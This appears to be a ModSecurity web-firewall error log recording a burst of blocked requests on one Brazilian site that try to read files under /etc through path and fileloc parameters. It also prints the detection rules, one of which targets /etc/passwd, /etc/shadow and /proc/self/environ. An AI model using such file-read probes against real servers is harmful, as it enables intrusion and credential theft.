[Thu Mar 19 13:22:32.722255 2026] [:error] [pid 19093:tid 140411683178240] [client 57.141.18.117:49752] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiyF_V7PWP6ixUYl7PtQAAAoc"]
[Thu Mar 19 13:22:32.937314 2026] [:error] [pid 14269:tid 140411607643904] [client 57.141.18.4:49754] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiyAbLMZ6AikZjR9VwggAAABA"]
[Thu Mar 19 13:22:33.339473 2026] [:error] [pid 26799:tid 140411590858496] [client 57.141.18.98:49764] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiyda6ubjKNq_cu4ZpzAAAA1I"]
[Thu Mar 19 13:22:33.510674 2026] [:error] [pid 31803:tid 140411582465792] [client 57.141.18.50:49770] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiyeyqAr6etmhZHNpy7AAAAFM"]
[Thu Mar 19 13:22:34.862618 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.108:49806] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiyta6ubjKNq_cu4ZpzgAAA0U"]
[Thu Mar 19 13:22:34.884635 2026] [:error] [pid 19093:tid 140411574073088] [client 57.141.18.77:49808] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiyl_V7PWP6ixUYl7PuAAAApQ"]
[Thu Mar 19 13:22:35.331583 2026] [:error] [pid 19093:tid 140411733534464] [client 57.141.18.91:49782] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiy1_V7PWP6ixUYl7PugAAAoE"]
[Thu Mar 19 13:22:35.823750 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.3:49836] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiy9a6ubjKNq_cu4Zp0QAAA04"]
[Thu Mar 19 13:22:35.880772 2026] [:error] [pid 14269:tid 140411691570944] [client 57.141.18.49:49838] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiywbLMZ6AikZjR9VwhwAAAAY"]
[Thu Mar 19 13:22:36.538090 2026] [:error] [pid 27293:tid 140411716749056] [client 57.141.18.17:49848] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwizP-YZRR_7pZ7nDKemgAAA8M"]
[Thu Mar 19 13:22:36.995308 2026] [:error] [pid 31803:tid 140411616036608] [client 57.141.18.67:49856] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwizOyqAr6etmhZHNpy7gAAAE8"]
[Thu Mar 19 13:22:37.306061 2026] [:error] [pid 19093:tid 140411590858496] [client 57.141.18.35:49862] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwizV_V7PWP6ixUYl7PuwAAApI"]
[Thu Mar 19 13:22:37.331957 2026] [:error] [pid 31803:tid 140411574073088] [client 57.141.18.13:49864] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwizeyqAr6etmhZHNpy7wAAAFQ"]
[Thu Mar 19 13:22:37.727282 2026] [:error] [pid 17653:tid 140411590858496] [client 57.141.18.19:49874] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwizcdf6f5d65gmYZSMUQAAAtI"]
[Thu Mar 19 13:22:38.120624 2026] [:error] [pid 27403:tid 140411649607424] [client 57.141.18.16:49882] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwizhkFeYa1D6dYQnAERQAAAcs"]
[Thu Mar 19 13:22:38.392262 2026] [:error] [pid 14269:tid 140411548894976] [client 57.141.18.53:49890] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwizgbLMZ6AikZjR9VwiAAAABc"]
[Thu Mar 19 13:22:39.015348 2026] [:error] [pid 19093:tid 140411540502272] [client 57.141.18.47:49896] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiz1_V7PWP6ixUYl7PvQAAApg"]
[Thu Mar 19 13:22:39.412200 2026] [:error] [pid 17653:tid 140411658000128] [client 57.141.18.2:49910] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwiz8df6f5d65gmYZSMUwAAAso"]
[Thu Mar 19 13:22:39.730519 2026] [:error] [pid 14269:tid 140411590858496] [client 57.141.18.53:49918] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwizwbLMZ6AikZjR9VwigAAABI"]
[Thu Mar 19 13:22:40.377588 2026] [:error] [pid 14269:tid 140411733534464] [client 57.141.18.63:49932] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi0AbLMZ6AikZjR9VwjAAAAAE"]
[Thu Mar 19 13:22:40.384571 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.111:49934] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi0OoXxyEfFpUF8f8f-QAAAUo"]
[Thu Mar 19 13:22:40.811283 2026] [:error] [pid 15826:tid 140411666392832] [client 57.141.18.122:49946] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi0OoXxyEfFpUF8f8f-wAAAUk"]
[Thu Mar 19 13:22:41.448621 2026] [:error] [pid 19093:tid 140411641214720] [client 57.141.18.93:49966] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi0V_V7PWP6ixUYl7PwAAAAow"]
[Thu Mar 19 13:22:41.467367 2026] [:error] [pid 19093:tid 140411624429312] [client 57.141.18.32:49968] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwi0V_V7PWP6ixUYl7PwQAAAo4"]
[Thu Mar 19 13:22:42.410791 2026] [:error] [pid 19093:tid 140411658000128] [client 57.141.18.91:49982] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi0l_V7PWP6ixUYl7PwgAAAoo"]
[Thu Mar 19 13:22:42.420246 2026] [:error] [pid 31803:tid 140411540502272] [client 57.141.18.73:49984] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi0uyqAr6etmhZHNpy8AAAAFg"]
[Thu Mar 19 13:22:42.890495 2026] [:error] [pid 14269:tid 140411607643904] [client 57.141.18.10:49992] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi0gbLMZ6AikZjR9VwjQAAABA"]
[Thu Mar 19 13:22:43.196438 2026] [:error] [pid 19093:tid 140411741927168] [client 57.141.18.72:49996] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwi01_V7PWP6ixUYl7PwwAAAoA"]
[Thu Mar 19 13:22:43.696199 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.84:50006] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi0-oXxyEfFpUF8f8f_AAAAVg"]
